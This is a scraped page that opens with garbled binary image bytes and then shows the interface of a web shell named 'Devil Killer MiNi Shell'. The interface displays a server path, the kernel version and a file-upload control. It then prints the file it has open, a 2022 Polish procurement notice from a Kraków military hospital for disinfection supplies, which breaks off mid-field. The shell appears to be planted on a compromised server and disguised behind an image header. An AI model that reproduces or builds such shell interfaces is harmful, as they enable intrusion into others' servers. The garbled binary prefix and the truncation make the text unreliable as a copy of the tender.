JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220915/0034902801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy materiałów do dezynfekcji </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">5 Wojskowy Szpital Kliniczny z POlikliniką SP ZOZ w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351506868</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wrocławska 1-3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-901</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam@5wszk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://5wszk.com.pl/zamowienia-publiczne</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy materiałów do dezynfekcji </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1acbd765-34cd-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00349028</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00030205/26/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.23 dostawy materiałów do dezynfekcji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://5wszk.com.pl/zamowienia-publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://5wszk.com.pl/zamowienia-publicznehttps://miniportal.uzp.gov.pl/https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówieniakomunikacjamiędzyZamawiającymaWykonawcamiodbywasięprzyużyciuminiPortaluhttps://miniportal.uzp.gov.pl/,ePUAPuhttps://epuap.gov.pl/wps/portalorazpocztyelektronicznej.postępowaniu<br/>o udzielenie zamówieniapublicznego, musiposiadać konto naePUAP.Wykonawcaposiadający konto naePUAPma dostępdoformularzy:złożenia,zmiany, wycofania ofertylubwnioskuoraz do formularza dokomunikacji.Wymaganiatechniczne iorganizacyjnewysyłaniaiodbieraniadokumentówelektronicznych,elektronicznych<br/>kopiidokumentów i oświadczeńorazinformacjiprzekazywanych przy ich użyciuopisanezostaływRegulaminiekorzystania z miniPortaluorazRegulaminieePUAP.Maksymalny rozmiarplikówprzesyłanychza<br/>pośrednictwemdedykowanychformularzy do:złożenia,zmiany, wycofaniaofertylubwniosku oraz do komunikacjiwynosi150 MB.Za datę<br/>przekazaniaoferty,wniosków,zawiadomień,dokumentówelektronicznych,oświadczeńlubelektronicznychkopii dokumentów luboświadczeń orazinnych informacji<br/>przyjmuje<br/>siędatęichprzekazania naePUAP. Danepostępowaniapoza SWZ możnawyszukaćrównież na Liściewszystkichpostępowań klikając wcześniejopcję„DlaWykonawców”<br/>lubzestrony głównej z zakładki Postępowania na miniPortalu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że:1.Administratoremdanychosobowychudostępnionych wramachpostępowaniajestZamawiający.2.Kontakt do inspektoraochrony danych osobowych: adres e-mail :rodo@5wszk.com.pl,pisemnienaadresZamawiającego:5Wojskowy SzpitalKliniczny z Polikliniką SP ZOZ wKrakowie, ul.Wrocławska 1-3, 30-<br/>901Kraków3.Daneosoboweprzetwarzane będąwzwiązkuzkoniecznościąwypełnieniaobowiązkuprawnego ciążącego na zamawiającym, wceluzwiązanymzniniejszympostępowaniemoudzieleniezamówieniapublicznego tj. zgodnie z art. 6 ust.1lit.c)rozporządzeniaParlamentuEuropejskiego iRady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r.wsprawieochronyosóbfizycznychwzwiązkuzprzetwarzaniem danych osobowych i w sprawieswobodnegoprzepływu<br/>takichdanychorazuchyleniadyrektywy95/46/WE(„RODO”) w zw. zustawą zdnia29stycznia 2004r.Prawozamówieńpublicznych(Dz.U.2017.1579 t.j. z dnia 2017.08.24)<br/>(„PZP”);4.Wrazierealizacjizamówieniapublicznegodane osobowe przetwarzanebędą w celu wykonaniaumowytj.zgodnie art. 6ust. 1<br/>litb)RODO.5.odbiorcamidanychosobowych będą osoby<br/>lubpodmioty,którymudostępnionazostaniedokumentacjapostępowania(komisjaprzetargowa)orazodpowiednieorganykontrole wzakresieichkompetencji; 6.Dane<br/>osobowe będą przechowywane,przezokres4latoddniazakończeniapostępowania o udzielenie zamówienia, a jeżeli<br/>czastrwaniaumowyprzekracza4lata,okresprzechowywania obejmujecały czastrwania umowy. Dane temogąbyćprzechowywaneprzezokresdłuższy niż wskazany, o<br/>ilewynika to z ustawy z dnia 14lipca1983r.onarodowymzasobiearchiwalnym iarchiwach (t.j. Dz. U. z 2018 r. poz. 217 z<br/>późn.zm.)iprzepisówwykonawczychdotejustawy.7.obowiązek podania danych osobowychjestwymogiemustawowymokreślonym wprzepisachustawy PZP,związanym<br/>zudziałem wpostępowaniuoudzieleniezamówieniapublicznego;konsekwencje niepodaniaokreślonych danychwynikają zustawyPZP;<br/>8.wodniesieniudodanychosobowych decyzje nie będą podejmowane wsposóbzautomatyzowany.9.Prawa osóbktórychdanesą przetwarzane:•<br/>prawodostępudodanychosobowych;• prawodosprostowaniadanychosobowych(Wyjaśnienie: skorzystanie<br/>zprawadosprostowanianiemożeskutkowaćzmianąwynikupostępowania)• prawo<br/>żądaniaodadministratoraograniczeniaprzetwarzaniadanychosobowych(prawodoograniczenia przetwarzanianiemazastosowania wodniesieniudoprzechowywania, w<br/>celuzapewnienia korzystaniaześrodkówochronyprawnej lub wceluochronypraw innej osoby fizycznej lubprawnej, lub z<br/>uwaginaważnewzględyinteresupublicznegoUniiEuropejskiej lub państwa członkowskiego); 10. prawodowniesieniaskargidoPrezesaUrzęduOchronyDanych Osobowych,gdyuzna Pani/Pan,żeprzetwarzaniedanychosobowychPani/Panadotyczących naruszaprzepisy;11.nieprzysługujePani/Panu:•prawodousunięcia<br/>danychosobowych;•prawodoprzenoszeniadanychosobowych;prawosprzeciwu,wobecprzetwarzaniadanychosobowych,<br/>gdyżpodstawąprawnąprzetwarzaniadanychosobowychjestkoniecznośćwypełnieniaobowiązku prawnego ciążącego na zamawiającym lubwykonanie umowy</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">obowiązek podaniadanychosobowychjestwymogiemustawowym określonym wprzepisachustawy PZP,związanymzudziałemwpostępowaniuoudzielenie zamówienia publicznego;konsekwencjeniepodaniaokreślonychdanychwynikają zustawyPZP; 8. w odniesieniu<br/>dodanychosobowychdecyzjeniebędąpodejmowanewsposóbzautomatyzowany. 9. Prawa osób których danesąprzetwarzane:•prawodostępudodanychosobowych;•<br/>prawodosprostowania danychosobowych(Wyjaśnienie:skorzystaniezprawadosprostowania nie możeskutkowaćzmianąwynikupostępowania)•prawożądaniaodadministratoraograniczenia przetwarzania<br/>danychosobowych(prawodoograniczeniaprzetwarzanianiemazastosowania wodniesieniu do przechowywania, wceluzapewnieniakorzystaniaześrodkówochronyprawnej lub w celu ochrony praw innej osoby fizycznejlubprawnej, lubzuwagi naważnewzględyinteresu publicznego UniiEuropejskiej lub państwaczłonkowskiego); 10.prawodowniesieniaskargido Prezesa Urzędu OchronyDanychOsobowych,gdyuznaPani/Pan,żeprzetwarzaniedanychosobowych Pani/Pana dotyczących<br/>naruszaprzepisy;11.nieprzysługujePani/Panu:•prawodousunięciadanychosobowych;• prawo<br/>doprzenoszeniadanychosobowych;prawosprzeciwu,wobecprzetwarzaniadanych osobowych, gdyż podstawą prawnąprzetwarzania danych osobowych jest konieczność wypełnienia obowiązku<br/>prawnego ciążącego na zamawiającym lub wykonanie umowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">71/ZP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Opis preparatu	spektrum działania	Wielkość opakowania	Ilość	Cena netto	Wartość netto	Stawka VAT	Wartość brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Preparat myjąco-płuczący składajacy się z niejonowych środków powierzchniowo-czynnych,enzymów,glikoli,na bazie alkoholuz wykluczeniem substancji łatwopalnych. Niezawierający soli kwasów organicznych.Przeznaczenie : wrażliwe na temperaturę narzędzia chirurgiczne,aluminium oksydowane,szkło,obuwie operacyjne. Mycie w temp. do 60 stopni C.Ph 5,5-7 5 L	20 <br/>2.	Preparat składający się z aldehydu glutarowego,inhibitotora korozji (niezawierający glioksalu oraz soli kwasów organicznych)Przeznaczenie : dezynfekcja chemiczno-termiczna w temp. 60 stopni C narzędzi z tworzyw sztucznych ,osprzętu anestezjologicznego i elastomerów	B,F,Tbc( Mycobacterium tuberculosis),V- 5min.	5 L	10 <br/>3.	Preparat gotowy do użycia ,przeznaczony do mycia i dezynfekcji wierteł stomatologicznych, narzedzi wysokoobrotowych zawierający glikol propylenowy ,wodorotlenek potasowy z aktywatorem	B,F,V (HBV,HIV,Tbc)	2 L	30 <br/>4.	Gotowe chusteczki bezalkoholowe o właściwościach myjąco- dezynfekcyjnych. Zawierające czwartorzędowe związki amonowe ( chlorek didecylodimetyloamoniowy). Odpowiednie do stosowania na wszystkich powierzchniach nieodpornych na działanie alkoholii, łącznie z głowicami USG	B,TBC,F,V, Norovirus	200szt	750 <br/>5.	Środek do manualnej konserwacji narzędzi po ręcznym lub maszynowym myciu narzędzi zawierający w składzie sterylny olej parafinowy 400ml spray	10 <br/>6.	Preparat neutralizujacy na bazie kwasu cytrynowego przeznaczony do neutralizacji po myciu alkalicznym narzędzi chirurgicznych ,endoskopów sztywnych ,przedmiotów z tworzyw sztucznych i gumy ,ph 1,1,lkoncentrat 5l	5 <br/>7.	Preparat płuczący o kwaśnym pH (pH koncentratu 2,1) do myjni naczyń sanitarnych (np. kaczek i basenów) zawierający surfaktanty ułatwiające suszenie, posiadający zdolność rozpuszczania soli wapnia. Możliwość zastosowania stężeń od 0,05% do 0,3% w zależności od twardości wody i stosowanego programu myjni. pH roztworu roboczego: od 4,0 do 3,5 (odpowiednio dla stężeń 0,05% do 0,3%). Gęstość koncentratu: 1,021g/ml. Opakowanie: kanister 5l. 5l	10 <br/>Razem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Opis preparatu	spektrum działania	Wielkość opakowania	Ilość	Cena netto	Wartość netto	Stawka VAT	Wartość brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Preparat zawierający dwuaminękokospropylenu i związki powierzchniowo czynne do mycia i dezynfekcji narzędzi chirurgicznych oraz endoskopów zarówno sztywnych jak i giętkich ,preparat nie zawierający :aldehydów fenoli,QAV,alkoholi,aktywnego tlenu i biguanidyny .Preparat przebadany metodą nośnikową dla B,Tbc,F.Możliwość użycia w myjkach ultradżwiękowych . Roztwór 2% działający na B,F,Tbc,V w czasie 15 min.	B, Tbc, F, V,(HBV,HCV,HIV,Papova,Rota,Vaccina) - do 15 min.,Adeno	1l	5 <br/>2.	Preparat zawierający dwuaminękokospropylenu i związki powierzchniowo czynne do mycia i dezynfekcji narzędzi chirurgicznych oraz endoskopów zarówno sztywnych jak i giętkich ,preparat nie zawierający :aldehydów fenoli,QAV,alkoholi,aktywnego tlenu i biguanidyny .Preparat przebadany metodą nośnikową dla B,Tbc,F.Możliwość użycia w myjkach ultradżwiękowych . Roztwór 2% działający na B,F,Tbc,V w czasie 15 min.	B, Tbc, F, V,(HBV,HCV,HIV,Papova,Rota,Vaccina) - do 15 min.,Adeno	5l	280 <br/>3.	Pompka do pojemnika z poz 2 10 <br/>4.	Preparat do dezynfekcji skóry ,gotowy do użycia, alkoholowy roztwór PVP-J, barwiony o działaniu natychmiastowym i przedłużonym	B,F,V,Tbc	1 l	15 <br/>5.	Preparat do odkażania skóry i śluzówek oraz antyseptyk do przepłukiwania jam ciała 7-10 % wodny roztwór PVP-J.Każda butelka ze spryskiwaczem.	B,F,V,Tbc, pierwotniaki	250 ml	120 <br/>6.	Preparat do odkażania skóry i śluzówek oraz antyseptyk do przepłukiwania jam ciała 7-10 % wodny roztwór PVP-J.	B,F,V,Tbc, pierwotniaki	1 l	120 <br/>7.	Preparat tlenowy w proszku do dezynfekcji wysokiego stopnia narzędzi endoskopów ( w tym giętkich ),sprzętu anestezjologicznego i laboratoryjnego , bez konieczności dodawania aktywatora ,o szerokim spectrum działania . Aktywność roztworu do 24 godzin.	B,V( Polio ,Adeno)F,Tbc-15 minut,S(Bacillus subtilis,Bacillus cereus,Clostr. Difficile) do 5 min.	800 g	20 <br/>8.	Emulsja do codziennej pielęgnacji rąk w szczegolności o skórze wysuszonej i zniszczonej. Zawierajaca alantoinę i panthenol oraz nawilżajace glikolipidy , bez parabenów i barwników. 500 ml	150 <br/>9.	Sterylny płyn gotowy do użycia zawierający polihexanidynę i betainę służący do czyszczenia, nawilżania i pielęgnacji ran (w tym oparzeniowych) oraz opatrunków w stanie wilgotnym, jak również do usuwania włóknistych płaszczy/biofilmów z rany w sposób zapewniający ochronę tkanki. Możliwość użycia nie krócej niż do 8 tyg po otwarciu.	-	350 ml.	800 <br/>10.	Sterylny żel gotowy do użycia zawierający polihexanidynę i betainę służący do czyszczenia, nawilżania i pielęgnacji ran (w tym oparzeniowych) oraz opatrunków w stanie wilgotnym, jak również do usuwania włóknistych płaszczy/biofilmów z rany w sposób zapewniający ochronę tkanki. Możliwość użycia nie krócej niż do 8 tyg po otwarciu.	-	30 ml	250 <br/>Razem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Opis preparatu	spektrum działania	Wielkość opakowania	Ilość	Cena netto	Wartość netto	Stawka VAT	Wartość brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Preparat w koncentracie płynnym do mycia i dezynfekcji powierzchni zawierających co najmniej 3 substancje aktywne z różnych grup chemicznych ,bez zawartości: aldehydów ,chloru,substancji zapachowych ,aktywnego tlenu ,izopropanolu.Możloiwość zalewania suchych chusteczek	Bakteriobójczy (warunki czyste i brudne) do 5 min.;prątkobójczy,mykobakteriobójczy(wg EN 14348)(warunki czyste i brudne),wirus Adeno - do 60 min;Rota wirus do 5 min.;HIV,HCV,HBV,- do 15 min.;Noro wirus mysi,M.tuberculosis - do 30 min.	2 litry	5,00 <br/>2.	Preparat w koncentracie płynnym do mycia i dezynfekcji powierzchni zawierających co najmniej 3 substancje aktywne z różnych grup chemicznych ,bez zawartości: aldehydów ,chloru,substancji zapachowych ,aktywnego tlenu ,izopropanolu.Możloiwość zalewania suchych chusteczek	Bakteriobójczy (warunki czyste i brudne) do 5 min.;prątkobójczy,mykobakteriobójczy(wg EN 14348)(warunki czyste i brudne),wirus Adeno - do 60 min;Rota wirus do 5 min.;HIV,HCV,HBV,- do 15 min.;Noro wirus mysi,M.tuberculosis - do 30 min.	6 litrów	180,00 <br/>Razem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 